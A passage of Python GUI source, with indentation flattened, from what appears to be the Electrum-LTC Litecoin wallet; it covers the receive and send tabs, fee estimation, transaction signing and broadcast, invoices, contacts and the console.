vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Litecoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Litecoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Litecoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = bool(self.config.get('use_rbf', True))
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, args, self.password_dialog, **kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
